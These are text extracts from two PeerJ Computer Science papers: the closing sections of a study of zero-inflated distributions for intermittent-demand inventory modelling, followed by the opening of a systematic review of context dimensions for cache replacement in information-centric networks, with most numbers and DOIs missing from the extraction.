parameters of the proposed statistical distribution to model dput and ltd and its competi- tors. statistical modeling parameters distribution random variable zitno dput µno = . unit/day, σno = . unit/day, ν= . simple exponential smoothing dput µses = . unit/day, σses = . unit/day croston’s dput µcrost = . unit/day, σcrost = . unit/day zitnosum ltd µnoµk = . unit/day, σzitno √ µk = . unit/day, νs = . simple exponential smoothing sum ltd µsesµk = . unit/day, σses √ µk = . unit/day croston’s sum ltd µcrostµk = . unit/day, σcrost √ µk = . unit/day with respect to the empirical distribution, where the points should ideally approach a diagonal line. since all values were within confidence bands, we propose that the statistical distribution correctly fits the data. table shows the parameters calculated using our proposed statistical distribution and its competitors. proposed statistical distribution inventory model performance. we considered the following costs involved in the application of a q,r inventory model with shortage: hc= , usd$/(unit*year), oc= , usd$/order, sc= , usd$/cycle, and constant ltd = days. table shows the performance measures relative to q*, r, tc, s (r), fill-rate, and kullback–leibler divergence when applying an q,r inventory model with shortage and the rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table q,r model with shortage performance measures using the proposed statistical distribution to model dput/ltd. modeling q* r tc s(r) (quantity fill-rate kullback–leibler dput/ltd (unit) (unit) (usd) of shortage/ cycle) divergence zitno/ zitnosum , . . simple exponential smoothing / simple exponential smoothing sum , . . croston’s /croston’s sum , . . proposed statistical distributions for the dput/ltd modeling. note that all performance measures using zitno/zitnosum favored our intermittent demand model. discussion we adapted our algorithm from (willemain, smart & schwarz, ), for the use of zitno and zitnosum distributions to model dput and ltd, respectively. our model optimizing of the annual total cost of expected inventory with shortage results in lower total costs and smaller shortages per cycle in almost all cases compared to traditional methods used to model intermittent demand such as simple exponential smoothing and its variant, croston’s method. table shows that the zitno/zitnosum statistical distribution method performs better than the traditional slow-moving inventory models when modeling intermittent dput and ltd. here, we must acknowledge that the standard methods also achieved good fill-rate with a satisfaction of the dput. however, in most cases, our proposal achieved lower total costs and smaller non-supplied quantities than traditional methods. our proposed method was effective regardless of the number of zeros contained in the dput data samples. the simple exponential smoothing and croston’s method approaches have been extensively employed in intermittent demand forecasting (balugani et al., ). however, they lack the properties of a statistical distribution, so they generally show low performance measures when used in stochastic inventory models, such as the one studied in this work. once we confirmed that the zitno statistical distribution achieved good yields in the considered inventory model, we studied how the parameter of variability and the proportion of zeros that defined this statistical distribution affected total costs, q and r decisions, and possible connections. the most important relationship found was between the proportion of zeros in dput, which shows the degree of intermittency of this variable, the square root of this same parameter and the reorder point decisions. this relationships were explained by a multiple linear regression model. at first glance, the low intermittency of dput has a positive proportionality related with the square root of the parameter of proportion of zeros in demand ( √ ν), and later it suffers a decay by increasing the intermittency of the dput (ν). this behavior is important to decision-makers that need to consider the degree of dput intermittency for their reorder point decisions. we confirmed that the parameter of variability of the zitno statistical distribution positively correlated with reorder point decisions. that is, as the variability of the non-zero dput increases, the rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. reorder points must also increase. the previous conclusion was logical since this indicator can protect shortages against scenarios of greater variability. however, it does not alter the ordered quantities or the total costs of the inventory policy. in our study, we looked at actual data from a real case study to corroborate our method’s performance. we think that the use of zitno statistical distribution is especially suitable for intermittent demand due to its capability for modeling non-zero and zero demand cases. we tested our method by calculating indicated statistical distribution, and achieved good ltd distribution adjustment results. we also obtained good results when the non-zero data were slightly asymmetrical and when the zero values of the dput showed a high proportion. our main objective was to create models as close to reality as possible, but we acknowledge that this topic of study is an area of ongoing research that need more empirical results in future research. in this context, it is necessary to study the adaptation to skewness and kurtosis of the non-zero data of an intermittent demand in diverse stochastic inventory models, for this and other mixture statistical distributions, because these characteristics of the probability distributions could directly affect the results obtained in r and s(r). another important limitation to point out is that the busy optimization method is for each item or product in a particular way. for this reason, it would be important to consider multi-product stochastic programming in future research considering our proposed zitno and zitnosum statistical distributions. in the future, we plan to address some limitations shown in this study, such as the assumption of constant lt, which we used to model the ltd as a sum of dput. conclusion in this paper, we developed a new methodological framework for intermittent demand modeling. we were able to generate an ltd jitter in the case of an intermittent dput. we used numerical experiments to show that our proposed statistical distributions zitno and zitnosum leads to better results in a continuous revision inventory model with shortage. in particular, we used the multi-criteria topsis method across multiple scenarios with different proportions of zeros in the dput and cost of ordering, storing, and shortage parameters. in slow-moving items modeled by our proposal of statistical distribution, decisions q and r are affected by the level of intermittent demand. both decrease but not proportionally in the case of the decision of r, because the proportion of zeros in the dput is a parameter that affects the variability of the ltd. rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding this work was supported by fondecyt initiation project code: , chile. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: fondecyt initiation project code: , chile. competing interests the authors declare there are no competing interests. author contributions • fernando rojas conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • peter wanke conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. • giuliani coluccio and juan vega-vargas performed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. • gonzalo f. huerta-canepa performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: a total of scenarios simulated of dput with diverse level of intermittency and actual data of an illustrative example are available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references aiken ls, west sg, reno rr. . multiple regression: testing and interpreting interac- tions. london: sage. aloulou ma, dolgui a, kovalyov my. . a bibliography of non-deterministic lot-sizing models. international journal of production research ( ): – doi . / . . . antosz k, ratnayake rc. . spare parts criticality assessment and prioritization for enhancing manufacturing systems availability and reliability. journal of manufactur- ing systems : – doi . /j.jmsy. . . . rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / . . http://dx.doi.org/ . /j.jmsy. . . http://dx.doi.org/ . /peerj-cs. aye gc, gupta r, wanke p. . efficiency in south african agriculture: a two-stage fuzzy approach. benchmarking: an international journal ( ): – . ayu nariswari np, bamford d, dehe b. . testing an ahp model for aircraft spare parts. production planning & control ( ): – doi . / . . . babai mz, syntetos a, teunter r. . intermittent demand forecasting: an empirical study on accuracy and the risk of obsolescence. international journal of production economics : – doi . /j.ijpe. . . . balugani e, lolli f, gamberini r, rimini b, babai m. . a periodic inventory system of intermittent demand items with fixed lifetimes. international journal of production research ( ): – doi . / . . . bethea rm. . statistical methods for engineers and scientists. new york: routledge. cattani kd, jacobs fr, schoenfelder j. . common inventory modeling as- sumptions that fall short: arborescent networks, poisson demand, and single- echelon approximations. journal of operations management ( ): – doi . /j.jom. . . . cobb b. . mixture distributions for modelling demand during lead-time. journal of the operational research society : – . cobb b, rumí r, salmerón a. . inventory management with log-normal demand per unit time. computers and operations research : – doi . /j.cor. . . . croston jd. . forecasting and stock control for intermittent demands. journal of the operational research society ( ): – doi . /jors. . . de andrade lh, antunes jjm, wanke p. . performance of tv programs: a robust mcdm approach. benchmarking: an international journal ( ): – . devika k, jafarian a, hassanzadeh a, khodaverdi r. . optimizing of bullwhip effect and net stock amplification in three-echelon supply chains using evolutionary multi-objective metaheuristics. annals of operations research ( ): – doi . /s - - -y. ewbank h, roveda jaf, roveda srmm, ribeiro a, bressane a, hadi-vencheh a, wanke p. . sustainable resource management in a supply chain: a methodolog- ical proposal combining zero-inflated fuzzy time series and clustering techniques. journal of enterprise information management epub ahead of print jul . gregersen ng, hansen znl. . inventory centralization decision framework for spare parts. production engineering ( – ): – doi . /s - - - . hadley g, whitin t. . analysis of inventory systems. new jersey: prentice-hall. hahn g, leucht a. . managing inventory systems of slow-moving items. interna- tional journal of production economics : – doi . /j.ijpe. . . . johnson nl, kotz s, balakrishnan n. . continuous univariate distributions. vol. . new york: wiley. johnson la, montgomery dc. . operations research in production planning, scheduling and inventory control. new york: wiley. rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . . http://dx.doi.org/ . /j.ijpe. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /j.jom. . . http://dx.doi.org/ . /j.cor. . . http://dx.doi.org/ . /jors. . http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.ijpe. . . http://dx.doi.org/ . /peerj-cs. jonkman j, barbosa-póvoa ap, bloemhof jm. . integrating harvesting decisions in the design of agro-food supply chains. european journal of operational research ( ): – doi . /j.ejor. . . . khosravi a, koury r, machado l, pabon j. . prediction of hourly solar radiation in abu musa island using machine learning algorithms. journal of cleaner production : – doi . /j.jclepro. . . . kim s, kim h. . a new metric of absolute percentage error for intermit- tent demand forecasts. international journal of forecasting ( ): – doi . /j.ijforecast. . . . kourentzes n. . on intermittent demand model optimisation and selection. interna- tional journal of production economics : – doi . /j.ijpe. . . . langseth h, nielsen t, pérez-bernabé i, salmerón a. . learning mixtures of truncated basis functions from data. international journal of approximate reasoning : – doi . /j.ijar. . . . mosteller f, tukey jw. . data analysis and regression: a second course in statistics. in: addison-wesley series in behavioral science: quantitative methods. boston: addison-wesley publishing company. nahmias s. . production and operations analysis. new york: mcgraw hill. pavlas m, somplak r, smejkalova v, nevrly v, zaviralova l, kuudela j, popela p. . spatially distributed production data for supply chain models-forecasting with hazardous waste. journal of cleaner production : – doi . /j.jclepro. . . . ponte b, costas j, puche j, pino r, de la fuente d. . the value of lead time reduction and stabilization: a comparison between traditional and collaborative supply chains. transportation research part e: logistics and transportation review : – doi . /j.tre. . . . rojas f. . time dependence in joint replacement to multi-products grouped. the case of hospital food service. cogent engineering ( ): doi . / . . . rojas f, leiva v, wanke p, lillo c, pascual j. . modeling lot-size with time- dependent demand based on stochastic programming and case study of drug supply in chile. plos one ( ):e doi . /journal.pone. . salvatier j, wiecki tv, fonnesbeck c. . probabilistic programming in python using pymc . peerj computer science :e doi . /peerj-cs. . silver e, pyke d, peterson r. . inventory management and production planning and scheduling. new york: wiley. sobel mj. . fill rates of single-stage and multistage supply systems. manufacturing & service operations management ( ): – doi . /msom. . . spedicato ga. . markovchain: discrete time markov chains made easy. r package version . . . syntetos aa, babai z, boylan je, kolassa s, nikolopoulos k. . supply chain fore- casting: theory, practice, their gap and the future. european journal of operational research ( ): – doi . /j.ejor. . . . rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.ejor. . . http://dx.doi.org/ . /j.jclepro. . . http://dx.doi.org/ . /j.ijforecast. . . http://dx.doi.org/ . /j.ijpe. . . http://dx.doi.org/ . /j.ijar. . . http://dx.doi.org/ . /j.jclepro. . . http://dx.doi.org/ . /j.tre. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /msom. . http://dx.doi.org/ . /j.ejor. . . http://dx.doi.org/ . /peerj-cs. teixeira c, lopes i, figueiredo m. . classification methodology for spare parts management combining maintenance and logistics perspectives. journal of manage- ment analytics ( ): – doi . / . . . Ünlü y. . zero-modified distributions for inventory control under intermittent demand. in: iie annual conference. proceedings. institute of industrial engineers- publisher, . wanke p. . consolidation effects: assessing the impact of tail dependence on inven- tory pooling using copulas. international journal of inventory research : – doi . /ijir. . . wen m, chen y, yang y, kang r, guo m. . optimization of spares varieties in the uncertain systems. journal of intelligent & fuzzy systems ( ): – . willemain tr, smart cn, schwarz hf. . a new approach to forecasting inter- mittent demand for service parts inventories. international journal of forecasting ( ): – doi . /s - ( ) -x. yang m. . statistical models for count time series with excess zeros. master diserta- tion, university of iowa, iowa, us. yoon kp, hwang c. . multiple attribute decision making: an introduction. vol. . sage publications. zeileis a, kleiber c, jackman s. . regression models for count data in r. journal of statistical software : – . zhang w, xiaofeng w. . simulation of the inventory cost for rotable spare with fleet size impact. academic journal of manufacturing engineering ( ): – . rojas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . . http://dx.doi.org/ . /ijir. . http://dx.doi.org/ . /s - ( ) -x http://dx.doi.org/ . /peerj-cs. contextual dimensions for cache replacement schemes in information-centric networks: a systematic review contextual dimensions for cache replacement schemes in information- centric networks: a systematic review stéfani pires , , artur ziviani and leobino n. sampaio department of computer science, federal university of bahia (ufba), salvador, brazil federal institute of bahia (ifba), salvador, brazil national laboratory for scientific computing (lncc), petrópolis, brazil abstract in recent years, information-centric networks (icns) have gained attention from the research and industry communities as an efficient and reliable content distribution network paradigm, especially to address content-centric and bandwidth-needed applications together with the heterogeneous requirements of emergent networks, such as the internet of things (iot), vehicular ad-hoc network (vanet) and mobile edge computing (mec). in-network caching is an essential part of icn architecture design, and the performance of the overall network relies on caching policy efficiency. therefore, a large number of cache replacement strategies have been proposed to suit the needs of different networks. the literature extensively presents studies on the performance of the replacement schemes in different contexts. the evaluations may present different variations of context characteristics leading to different impacts on the performance of the policies or different results of most suitable policies. conversely, there is a lack of research efforts to understand how the context characteristics influence policy performance. in this direction, we conducted an extensive study of the icn literature through a systematic literature review (slr) process to map reported evidence of different aspects of context regarding the cache replacement schemes. our main findings contribute to the understanding of what is a context from the perspective of cache replacement policies and the context characteristics that influence cache behavior. we also provide a helpful classification of policies based on context dimensions used to determine the relevance of contents. further, we contribute with a set of cache-enabled networks and their respective context characteristics that enhance the cache eviction process. subjects computer networks and communications, emerging technologies keywords information-centric network, cache replacement policy, context awareness introduction the internet architecture was originally designed in a host-centric paradigm to support end-to-end communication. this model struggles to face key communication requirements of modern network applications such as high content distribution, node’s mobility, and network scalability. therefore, researchers have devoted effort studying future internet architectures as alternatives to the ip’s host-centric model. the current practice moves forward to a more content-centric approach since the massive internet usage is to disseminate content regardless of its location. information-centric networking how to cite this article pires s, ziviani a, sampaio ln. . contextual dimensions for cache replacement schemes in information- centric networks: a systematic review. peerj comput. sci. :e doi . /peerj-cs. submitted november accepted february published march corresponding author leobino n. sampaio, leobino@ufba.br academic editor arun somani additional information and declarations can be found on page doi . /peerj-cs. copyright pires et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:leobino@�ufba.�br https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ (icn) (ahlgren et al., ) is one of such initiatives. icn is a content-centric network communication model that stand out as potential candidate to substitute the current tcp/ip model (rahman et al., ). it consists of a receiver-driven networking model that focuses on the distribution and retrieval of contents through a publish-subscribe paradigm. in icns, a content request is based on the content’s name, not on its location, such as the content provider’s ip address. contents should have unique names, and any network node with the content can respond to the request. to this end, icn replicates content in a distributed way in cache-enabled routers (crs) over the network that are located closer to the user. therefore, delivering the closest content copies to the user saves communication resources, thus reducing network congestion, server loads, and access latency while providing better quality of service (qos) and quality of experience (qoe) levels. in addition, beyond the benefits of in-network caching, decoupling the content delivery process from the content location brings native support to mobility and multicast packet forwarding. content-centric networking (ccn) and its successor named-data networking (ndn) (zhang et al., ) are examples of initiatives implementing icn concepts. in general, any network device can potentially work as a cr with a content store (cs) data structure to implement the cache service. the performance of cs plays a vital role in the overall packet forwarding engine to guarantee high-speed packet processing of icn architectures. according to pan, huang & li ( ), pan et al. ( ), the performance bottleneck of the packet forwarding systems relies on cs operation and should be the focus of icn optimization strategies. this way, icn-based initiatives strongly rely on cache replacement policies to manage the cs and keep relevant content available to the users. least recently used (lru) and least frequently used (lfu) (ioannou & weber, ) are examples of policies used in icns. the current literature presents a massive number of performance evaluations for cache replacement policies comparing different policies concerning different network contexts. a network context refers to a network type—for example, edge networks, internet of things (iot) networks, or vehicular ad-hoc networks (vanets)—instantiated with particular characteristics for a given purpose. a network context thus brings up a broader view that encompasses characteristics regarding the network type and other entities related to network performance (e.g., user habits while using the network). each performance evaluation may present distinct variations in the context characteristics, as well as different impacts on policy performances, including changes in performance rank. the variance of results indicates that the policies’ performance tends to vary according to the context’s characteristics, and the process of choosing the suitable policies should consider the context in which the caches operate. given the above, several works incorporated the adaptation of policies according to some context. for instance, beck et al. ( ) proposed a rule-based stream reasoning technique to allow ccn routers to dynamically switch between existing cache replacement policies to adapt to network traffic changes. moreover, moon et al. ( ) presented a cache management scheme for wireless ndns, in which common access points (aps) and user devices attached to the aps have available cache capacity. the authors advocated pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ that each device can choose to work with a different cache replacement policy to improve network performance. in addition to that, charpinel et al. ( ) proposed a software- defined networking (sdn) approach to provide programable cache replacement algorithms. the replacement algorithms are defined in a control plane. meanwhile, a ccn controller can modify the replacement schemes dynamically and allocate different strategies for each node. finally, pacifici & dán ( ) proposed autonomous caching in peering isps for collaborative deciding their replacement policies. although studies recognize the need to adopt policies according to the network context, the choice itself of a suitable scheme is not trivial. there is no explicit and general understanding of the relationship between the context characteristics and the policies. such understanding is essential to assist the choosing process and, consequently, adapt policies according to the context. more specifically, there are no overall directions or categorization in which context may influence policy behavior. yet, regardless of the isolated evidence of individual works reporting their contexts and impacts on the policies’ performance, there is no comprehensive work discussing a unified view of the different contextual characteristics and their effects on the policies. the delimitation of context characteristics and their common effect can enhance and substantiate the caching management and the design of caching solutions. despite the contributions of previous literature reviews related to caching policies and icn aspects (ahlgren et al., ; bari et al., ; zhang, li & lin, ; tyson et al., ; xylomenos et al., ; fang et al., ; amadeo et al., ; zhang, luo & zhang, ; abdullahi, arif & hassan, ; fang et al., ; ioannou & weber, ; amadeo, campolo & molinaro, ; saxena et al., ; din et al., ), there is a lack of guidelines to understand context characteristics and their effect on the cache replacement policies in icns. furthermore, surveys on web cache replacement policies (wang, ; podlipnig & böszörmenyi, ; balamash & krunz, ; panda, patil & raveendran, ) do not address this subject. to the best of our knowledge, there is no broad investigation on cache replacement schemes for the icn domain or an integrated vision of the impacts of different context characteristics in the policy choice process. as a result, the lack of suitable schemes hinders the more efficient use of available cache resources, and therefore the effective extraction of the caching service expected benefits. in this article, we present a systematic literature review (slr) that, in contrast to previous works, investigates evidence in the literature about the effects of context aspects on cache replacement schemes’ performance. slr is a straightforward and consistent process to compile evidence to answer a set of research questions and help further understand the evidence reported. to this end, we first cataloged the cache replacement schemes used in icns. the current literature presents various proposed strategies exploring different context aspects to enhance the eviction logic, aiming to achieve more potentially precise and customized techniques. we mapped context dimensions related to the content, network, node, and human aspects. we then categorized the respective context properties used by the replacement schemes proposed for icns. with the context properties, we provide a taxonomy of context dimensions and a policy categorization accordingly. taxonomies may support the choosing process in the absence pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of the overall understanding of specific network contexts and what influences policy behavior. in addition to the taxonomy, we compiled the context variations with reported relevant impacts on the policies, especially those leading to changes in the policies’ performance rank. this slr was able to identify common context factors that differentiated the choice of best policy performance. even so, as expected, there is no single optimal strategy to meet the requirements of all surveyed network contexts, since the performance of the caching policies varied according to the characteristics of each network. last, we extended the slr results with the analysis of proper context dimensions to be explored by the eviction process in different emergent networks, such as information-centric internet of things (arshad et al., ; dong & wang, ), vehicular named-data networking (khelifi et al., ), and in-network cache-based edge computing solutions (zhou et al., ; zhang et al., ). these emergent networks have gained attention from the research and industry communities, fostering the evolution of heterogeneous icn solutions. the taxonomy and policy classification presented in this article can help to infer the choice among current or new policies adapted to these networks to ensure better network performance. hence, the contribution of this article is threefold. it (i) provides a classification of contexts to assist those engaged in the design of adaptive caching solutions for icn that target the more efficient use of available cache resources; (ii) substantiates the reasoning of the caching policy decision process during the design of caching systems by presenting and analyzing information from previous works; and (iii) contributes to the set of knowledge on caching systems regarding emergent networks and underpins context-aware caching solutions. the remainder of the article is organized as follows. background section presents the basic concepts of icn and cache replacement schemes. the following section outlines the slr methodology process, with the definition of the leading research questions. results and analysis section presents the slr results, with answers to the research questions and analysis of the main findings. in the ‘applications’ section, this work contributes with a discussion of emergent networks and the association with context dimensions that can be explored to enhance the cache eviction process. the following section discusses relevant research directions. finally, the last section concludes the article. background in this section, we present introductory concepts of icn architectures and cache replacement policies. information-centric networks information-centric networking is a new internet architecture proposal widely discussed in the literature designed to meet the current de facto usage pattern of the internet: the dissemination of content, such as videos and web pages. icn comprises interconnected core functionalities for content naming, caching, and routing/forwarding to natively provide a content dissemination network. in its fundamental concept, the content name becomes an essential element for network routing, enabling the decoupling of content pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ location from the content delivery process. allied to that, icn replicates contents in caches distributed across the network at the routers, and the closest copy will be returned when a user requests a content. beyond the advantages of caching that provide reductions of network congestion, server loads, and access latency, the premise of independence of content location paves the way for efficient content distribution. therefore, it adds advantages to icn architectures, such as native support for mobility and multicast communication. the informational rfc (rahman et al., ) presented by the internet research task force (irtf) information-centric networking research group (icnrg) discusses some approaches for the real-world deployment of icns and trial experiments. besides the clean-slate approach, there are directions for its coexistence with the tcp/ip—for example, the icn adoption as an overlay network. the overlay approach proposes icn islands deployed over existing ip infrastructure and connected using tunneling solutions. in this way, icn packets are encapsulated inside ip packets through icn/ip tunnels. madureira et al. ( ) propose a resembling overlay approach with an sdn-based core network connecting edge networks operating ndn. in that case, the sdn core network encapsulates the ndn packet. another approach is icn as an underlay network, with the icn islands connected to the internet through proxies or protocol conversion gateways. the literature presents several icn architectures, such as data-oriented network architecture (dona) (koponen et al., ), content mediator architecture for content- aware networks (comet) (garca et al., ), mobilityfirst (raychaudhuri, nagaraja & venkataramani, ), and the previously mentioned ndn. they explore different architectural decisions about the naming scheme, caching, and routing processes (xylomenos et al., ). overall, the support for in-network caching is an essential feature of icn design. in general, every router works with a cs structure to temporally store the contents. this way, when a router receives a content request, the router verifies whether the content is present in its own cs and immediately returns the content if stored locally. otherwise, the router will forward the request to another destination. among the different architectures, ndn outstands as a recent and promising trend to substitute (or coexist with) the current tcp/ip model. in ndn, each cr has three main structures to support in-network caching: cs, pending interest table (pit), and forwarding information base (fib). figure illustrates an overview of the interaction among these structures. a content request comes in the form of an interest packet to the cr, which returns a copy of the content in a data packet format if the content is already present in its cs for the same incoming interface of the interest packet. otherwise, a new pit entry records a pending interest with the respective incoming interface, and the cr forwards the interest packet according to some named-based protocol. multiple interests for the same data are aggregated in the same pit entry. once the data-packet arrives at the cr, the corresponding pit entry is satisfied by forwarding the data to the saved interfaces. the cs will, therefore, store the passing data according to some cache management protocols. there are different policies to tackle the management of the cs structure. they can be classified as placement and replacement policies. placement policies, also called pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ insertion policies, target the decision of whether a passing content should be stored locally. examples of placement policies include leave copy everywhere (lce), probabilistic caching (prob), leave copy down (lcd) (laoutaris, syntila & stavrakakis, ), betweenness centrality (betw) (chai et al., ), probcache (psaras, chai & pavlou, ), and crcache (wang et al., b). on the other hand, replacement policies are methods used to choose which content to evict from the cache when there is the need for storing new content, and no more space is available. examples of replacement policies include lru, lfu, random, first-in-first-out (fifo), recently/frequently used (lrfu) (lee et al., ) and recent usage frequency (ruf) (kang, lee & ko, ). this work focuses on replacement policies, as we detail in the following sections. cache replacement policies cache capacity tends to be a small segment of the amount of distinct content distributed over the network. thus, it is essential to have an efficient eviction scheme among the cache management protocols. a replacement policy ensures that the content most expected to be accessed in a short time will remain in the cache, and the policy will, therefore, elect to evict the content that is less expected to be accessed. the performance gain of a network of caches like icn depends on the reliability of the cache management, and different policies lead to different performance. traditional policies, such as lru, lfu, or fifo, are eviction strategies inherited from computer memory systems and are commonly used in icn and web-proxy caching domains. these policies have been massively explored to analyze cache characteristics and the performance of complex network contexts through approximation models. orthogonally, they were not designed to fit the needs of a network of caches and do not explore its potential. thus, the literature presents a variety of newly proposed schemes. cs pit fib interest packet forward data packet add incoming interface drop forward interest upstream cs pit clear entry data packet cache forward data packet discard data lookup miss lookup hit x x xx x figure packet forwarding engine at an ndn router (zhang et al., ). full-size doi: . /peerj-cs. /fig- pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ jin et al. ( ) surveyed solutions for mobile caching in icn, and among the contributions, they briefly described sets of cache insertion and replacement policies. besides the usual lru, lfu, fifo, and simple random, the list of replacement policies includes lrfu, lru-k (o’neil, o’neil & weikum, ), time aware least recent used (tlru) (bilal & kang, ), aging popularity-based caching scheme (apc) (li, liu & wu, ), frequency-based-fifo (fb-fifo) (gomaa et al., ), and adaptive replacement cache (arc) (megiddo & modha, ). however, there is no broader study on replacement schemes for icn domains. this slr cataloged the schemes proposed for icn to investigate contextual influences on the policies. therefore, this work does not seek to discuss individual policies, and the reader can refer to the original literature to further information. systematic literature review methodology the slr methodology specifies a well-defined searching protocol, with the definition of research questions, research strings, explicit inclusion criteria of articles, among other steps. the methodology used in this article follows an adaptation of previously adopted slrs in the software engineering discipline (kitchenham & charters, ; petersen et al., ). figure summarizes the adopted slr process. the planning process ensures delimitation of the search scope with the definition of leading research questions, inclusion criteria, and the necessary inputs to operate the search. the search process is the article triage phase to collect relevant works and extract meaningful data that match the research questions. the data analysis evaluates the extracted data to summarize the primary evidence and point contributions. the following subsections detail the planning, searching, and analysis processes. planning process this study aims to map context information associated with the performance of cache replacement strategies to help the choosing and design process while applying icn. since the scope and definition of context information can be relative to the research domain, we intended to characterize relevant dimensions surrounding the cache conduct search all retrieved papers screening of papers potential relevant papers data extraction relevant papers data analysis systematic review: outcomes steps planning search research questions (rqs) inclusion criteria scientific databases keywords search strings search methodology n = n = n = outputs for rqs analysis analysis of outcomes figure steps of the slr process. full-size doi: . /peerj-cs. /fig- pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ replacement schemes. additionally, we also intended to identify the cache replacement strategies applied and their context characteristics, and investigate reported evidence about how the identified context information influences the behavior of cache replacement policies in icns. to this end, we defined the following research questions (rqs): rq : what is context from the perspective of a cache replacement policy? rq : which are the context characteristics used by the policies? rq : which are the cache replacement strategies applied for in-networking caching in icn? rq : what context variations had effects on the performance of the cache replacement strategies? notice that the research questions correlate with each other in the sense that they rely on each other’s outputs in different ways: the first three questions are requisites to answer the last question; to answer rq it is necessary a primary overview direction for rq and also the output for rq ; the complete delimitation of context that answers rq is an iterative process that relies on rq and rq outcomes. after the definition of the research questions, we specified a list of relevant keywords based on the analysis of manually selected articles, and we defined correspondent search strings using and and or operators, as shown in table . the search strings were meant to drive automatic searches on relevant research engines. we adapted the search strings according to the syntax of the scientific databases. the selection criteria included works written in english, addressing any aspects of cache replacement policy comparisons in icns. we also had the articles approaching new schemes for the eviction process for icns as part of the contributions. searching process the first step of the searching process was applying the automatic searches as specified in the planning phase. we did not set a lower year threshold in the search databases for the publication year range, and the upper bound was set to . we cataloged a total of , articles in this phase. in the following, the screening process comprehended abstract reading and analysis of all matched articles, to filter according to the inclusion criteria. upon abstract filtering, we obtained articles. those were potential works where we could find answers to the predefined research questions. finally, we performed full article reading and analysis of the potential works to extract relevant information and evidence about the research questions. as a result, we reached a total of articles pertinent to our research. additionally, we incremented the results by carrying out a non-systematic snowballing research process on the read articles and search engines to table search string example. (“icn” or “ndn” or “ccn” or “information centric” or “information-centric” or “named data” or “named-data” or “content centric” or “content-centric”) and (“cache” or “caching”) and (“replacement” or “eviction” or “performance” or “management” or “policy” or “policies”) pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ update with new works not covered in the first search. this process resulted in the addition of two relevant documents. analysis process the resulting articles and their correspondent extracted data consisted the input for our study. in this phase, we categorized and correlated data from different articles to empirically mining relevant information patterns. we report our main findings regarding the research questions in the following section. results and analysis the slr process described in the previous section enabled us to answer the main research questions introduced in this manuscript. the following subsections describe the process to accomplished this. rq : context dimensions many definitions of context have been given in the literature as well as different methods to model and design context-aware applications (abowd et al., ; bettini et al., ; dey, ; liu, li & huang, ; vieira, tedesco & salgado, ; alegre, augusto & clark, ; van engelenburg, janssen & klievink, ). although there is no single consensual definition, they all converge on the importance and benefits of integrating the awareness of any relevant information from relevant entities with the computational environment. as a result of the literature review analysis process, our definition of context comprises, in a broad sense, information that can be used by the policy as input data to direct the eviction process. also, it includes information “external” to the policy that can be used within a computational environment and could influence the policy’s performance. to understand and delimit what entities could represent the context from the perspective of cache replacement strategies, we direct the article reading and extraction of possibly relevant information based on leading questions related to the content. since the process of dealing with contents is the overall purpose of having caching policies, we placed content as a feedstock for caching policies, and we defined questions from the content’s point of view, as follows: � what content is being requested? in this dimension, we seek for characteristics of the content itself (and the application), such as content size, popularity, type; � when is the content requested? this dimension specifies time-related information regarding the content and its relation to the user—for instance, time of access, time of creation, or user delay to receive the content. � where is the content located and distributed? this dimension specifies network characteristics, such as topology and link capacity, and features about the node/routers that store the content, such as cache capacity and the number of interfaces. � who is requesting the content? also, who is publishing the content? this dimension relates to the human aspect, in which preferences, behavior, and routines are mapped as pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a context dimension. the dimension can also refer to machine-to-machine communication, but, in this case, the characteristics overlap with information of the node contemplated in the previous dimension. therefore, we extracted relevant information that would apply to these dimensions and correlate with the cache replacement schemes. based on the extracted data, we characterized context 